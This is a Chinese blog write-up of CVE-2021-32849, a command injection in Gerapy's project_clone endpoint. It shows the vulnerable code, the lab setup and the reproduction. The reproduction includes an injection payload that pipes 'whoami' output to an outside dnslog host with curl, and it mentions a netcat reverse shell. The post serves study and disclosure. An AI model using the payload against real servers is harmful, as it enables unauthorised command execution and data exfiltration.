Gerapy 远程命令执行(CVE-2021-32849)分析和复现

最新推荐文章于 2024-08-05 21:05:25 发布
最新推荐文章于 2024-08-05 21:05:25 发布
阅读量942 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Destiny_one/article/details/121637212
版权

简介

Gerapy是一款基于Scrapy、Scrapyd、Django和Vue.js的分布式爬虫管理框架。

漏洞描述

该漏洞源于程序没有正确清理通过project_clone端点传递给Popen的输入。攻击者可利用该漏洞执行任意命令。

影响版本

Gerapy <= 0.9.7

代码分析

此次漏洞产生于gerapy/server/core/views.py文件

关键代码


@api_view(['POST'])
@permission_classes([IsAuthenticated])
def project_clone(request):
    """
    clone project from github
    :param request: request object
    :return: json
    """
    if request.method == 'POST':
        data = json.loads(request.body)
        address = data.get('address')
        if not address.startswith('http'):
            return JsonResponse({'status': False})
        address = address + '.git' if not address.endswith('.git') else address
        cmd = 'git clone {address} {target}'.format(address=address, target=join(PROJECTS_FOLDER, Path(address).stem))
        logger.debug('clone cmd %s', mcd)
        p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
        stdout, stderr = bytes2str(p.stdout.read()), bytes2str(p.stderr.read())
        logger.debug('clone run result %s', stdout)
        if stderr: logger.error(stderr)
        return JsonResponse({'status': True}) if not stderr else JsonResponse({'status': False})

漏洞所在的网站位置:

请添加图片描述
发送正常的请求包:
请添加图片描述
从代码,网站漏洞地址,发送的数据包可以分析出,在项目管理的创建的功能中,有一个功能可以克隆github上面的项目,在代码中以address的json数据进行接收,并将地址address拼接到cmd中,最后以Popen执行cmd,在中间没有存在过滤,检验也只是检验地址必须以http开头,.git进行结尾,所以我们可以进行拼接自己的命令来达成执行任意命令的目的

环境搭建

本次实验环境在kali虚拟机里进行搭建

执行以下命令进行安装gerapy

pip install gerapy==0.9.7 -i http://pypi.douban.com/simple --trusted-host pypi.douban.com 
pip install scrapyd -i http://pypi.douban.com/simple --trusted-host pypi.douban.com

可以通过gerapy检测安装是否成功
请添加图片描述

先运行scrapyd
请添加图片描述
然后通过以下命令设置gerapy的相关参数

gerapy init  ##初始化
cd gerapy   ##进入工作目录
gerapy migrate ##自动创建数据库
gerapy createsuperuser   ##设置管理员账号密码
gerapy runserver 0.0.0.0:8000   ##开启服务

设置完成后浏览器访问
请添加图片描述

漏洞复现

登入后台后,如图所示依次点击,项目管理>创建>克隆
请添加图片描述
然后随意填写通过burp进行抓包
然后在后面拼接上以下命令

;curl `whoami`.thh0lg.dnslog.cn

请添加图片描述
查看结果,命令结果成功被外带出来
请添加图片描述
进行反弹shell,因为此次环境为kali虚拟机,没有/dev/tcp这个特殊的设备进行调用socket,我就偷懒直接使用nc了,构造命令进行反弹,在其他实验环境中也可以使用不同的反弹shell方法
请添加图片描述
请添加图片描述

本文章仅供学习使用。由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
鸣蜩十四
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021-32849 Gerapy远程命令执行漏洞复现
include_voidmain的博客
03-09 1204
CVE-2021-32849 Gerapy远程命令执行漏洞复现
Gitlab 远程命令执行漏洞(CVE-2021-22205)分析
ML_Team的博客
10-29 3504
0x01 前言 GitLab 是由GitLab Inc.开发的一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,可通过Web界面访问公开或私人项目。由于GitLab存在未授权的端点,导致该漏洞在无需进行身份验证的情况下即可进行利用。 0x02 漏洞分析 未授权的端口在于用户注册:https://xx.xx.xx.xx/users/sign_up 还可以滥用Gitlab API接口列出所有项目(包括私有项目) https://xx.xx.xx.xx/api/v4/projec.
Gerapy clone 后台远程命令执行漏洞【CVE-2021-32849
Armandhe的博客
11-29 2565
Gerapy clone 后台远程命令执行漏洞【CVE-2021-32849
gerapy漏洞复现(CVE-2021-43857)
weixin_45778886的博客
01-05 4607
简介 Gerapy是一款基于Scrapy、Scrapyd、Django和Vue.js的分布式爬虫管理框架。 漏洞描述 该漏洞源于程序没有正确清理通过project/id/parse端点传递给Popen的输入。攻击者可利用该漏洞执行任意命令。 影响版本 Gerapy <= 0.9.8 代码分析 http://www.ctfiot.com/14043.html 漏洞复现 开启环境 弱口令:admin/admin进入后台,点击项目管理。 抓包 反弹shell 修改请求包,反弹shell。 反弹成功
CVE-2021-22205——Gitlab 远程命令执行漏洞复现
LiBai'S BLOG
11-10 8762
CVE-2021-22205Vuln Impact影响版本环境Fofa语法漏洞利用脚本反弹ShellEXP Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a .
log4j 远程执行代码CVE-2021-44228复现
beichenyyds的博客
03-02 3923
0x01 漏洞简述 2021年12月09日,360CERT监测发现Apache Log4j 2存在JNDI远程代码执行,漏洞等级:严重,漏洞评分:10.0。 Apache Log4j 2是一个开源的日志记录组件,使用非常的广泛,使用情况参考: https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core/usages 对此,360CERT建议广大用户尽快将·Apache Log4j 2进行升级,以免遭受黑客攻击。
CVE-2021-22205 Gitlab exiftool远程命令执行 复现
weixin_45715461的博客
07-13 853
CVE-2021-22205 Gitlab exiftool远程命令执行 复现
Log4j2远程命令执行CVE-2021-44228)
qq_40646572的博客
05-12 1416
我采用的是较为简单便捷的方法进行复现,全程只是使用了JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar工具,另外,还可以使用ysoserial-0.0.6-SNAPSHOT-all.jar以及marshalsec-0.0.3-SNAPSHOT-all.jar。使用jndi注入工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar ,进行rmi注入。启动服务后,进入主页面,点击页面中的?链接,跳转到,目标地址。及时升级log4j组件。
GitLab 远程命令执行漏洞复现(CVE-2021-22205)
Bird&Bird
12-02 4394
目录一、漏洞描述二、影响版本三、环境搭建四、漏洞复现4.1、脚本复现4.1.1、下载利用脚本 一、漏洞描述 GitLab 没有正确验证传递给文件解析器的图像文件,这导致远程命令执行,可执行系统命令。这是一个严重的问题。它现在在最新版本中得到缓解,漏洞编号CVE-2021-22205。 二、影响版本 11.9 <= GitLab(CE/EE)< 13.8.8 13.9 <= GitLab(CE/EE)< 13.9.6 13.10 <= GitLab(CE/EE)< 13
网络安全入门教程(非常详细)从零基础入门到精通!
2301_77160226的博客
08-05 651
网络安全领域犹如一座深邃的知识宝库,从零基础入门到精通是一段充满挑战但也充满收获的旅程。这不仅需要您对知识的不懈追求,更需要大量的实践与经验积累。希望本教程能够为您的网络安全学习之路点亮明灯,引领您在这个充满机遇与挑战的领域中稳步前行,最终成为一名优秀的网络安全专家,为构建安全的网络世界贡献自己的力量!
【网络安全】本地文件包含及远程文件包含漏洞详解
goldfish8848的博客
08-05 488
开发人员将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。这样编写代码能减少冗余,降低代码后期维护难度。保证网站整体风格统一:导航栏、底部footer栏等,把这些不会变的东西包含在一个文件中,可以保证整体效果的统一和代码量的减少。
网络安全中的IOC是指的什么?
Nove1205的博客
08-02 392
一分钟让你了解网络安全中的IOC是什么
自学黑客(网络安全
最新发布
2301_77160226的博客
08-05 925
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
《密码编码学与网络安全原理与实践》第三章 传统加密技术
m0_57291352的博客
08-05 791
代换置换代换技术(Substitution)定义:将明文字母替换为其他字母、数字或者符号的方法;如果明文被看作二进制比特串,则代换是用密文比特串来替代明文比特串。例如:Caesar密码、单表代换密码、Playfair密码、Hill密码、多表代换密码与一次一密换位技术/置换技术(Transposition):对明文字母的某种置换取得一种类型完全不同的映射。例如:栅栏技术等转轮机:如果将输入输出引脚当作字母表中的一个字母,那么一个圆筒就定义了一个单表替换。隐写术:字符标记、不可见墨水、针刺、打字机的色带校正。
【等保测评】网络安全服务认证技术规范(等级保护测评)
weixin_45840241的博客
08-02 616
5.1.3.4 报告编制阶段,应客观描述等级保护对象已采取的有效保护措施和存在的主要安全问题情况, 指出等级保护对象安全保护现状与相应等级的保护要求之间的差距,分析差距可能导致被测评系统面临的风险,给出等级保护测评结论,形成测评报告,测评报告应依据公安行政主管部门统一制订的网络安全等级保护测评报告模版的格式和内容要求编写,测评报告应通过评审并有相关记录。依据 GB/T 36959 提出的等级保护测评服务人员能力要求, 经授权的等级保护测评人员能力评估机构考核通过的专业测评技术人员。
【网络安全】|非对称加密体系-RSA算法
yangdan_jiayou的博客
08-02 347
答: 虽然私钥 𝑑 可以通过公钥 𝑒和 𝜙(𝑛)计算得出,但计算 𝜙(𝑛)需要知道 𝑛的两个素因子的值。如果攻击者仅知道 𝑛 和 𝑒,但不知道 𝑝 和 𝑞,那么计算 𝜙(𝑛) 是非常困难的,因为这是一个大数分解问题。问题2,已经解密算法m=c^d mod n,已知d为e关于ϕ(n)=t的模逆元,已知e, 且逆模元唯一,为什么不能得到私钥d,计算私钥指数d:计算e关于t的模逆元d,即找到一个整数d,满足(d×e) mod t = 1。生成密钥对:公钥为(n,e),私钥为(n,d)。
网络安全之不同阶段攻防手段(四)
子非渔
07-25 982
前面已经说过信息收集、扫描探测以及初始访问阶段的攻防手段,下面将说一下在攻击者获取到访问权限的情况下会接着如何进一步在网络中建立控制点、提权、横移以及完成攻击后的遗迹隐藏
【网络安全】——网络的攻击概述
lingxw的博客
07-31 502
网络安全威胁是指网络环境中存在的各种可能导致系统或数据受损、泄露、非法访问或被滥用的风险因素。以下是一些常见的网络安全威胁:病毒和恶意软件:这些是设计用来感染和破坏计算机系统的程序,可以通过电子邮件附件、下载文件或访问感染的网站传播。垃圾邮件和钓鱼:垃圾邮件是指未经请求的大量广告或欺诈邮件,钓鱼则是骗取个人敏感信息的一种方式,通常通过伪装成合法的机构或网站来实施。
F5 BIG-IP IQ 2021漏洞CVE-2021-22986:远程代码执行风险
### CVE-2021-22986: F5 BIG-IP-IQ 的远程代码执行漏洞分析 **背景**: CVE-2021-22986是一个针对F5 BIG-IP设备及其附属产品BIG-IP IQ(Intelligence Query)的安全漏洞。该漏洞允许攻击者通过不安全的API调用,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值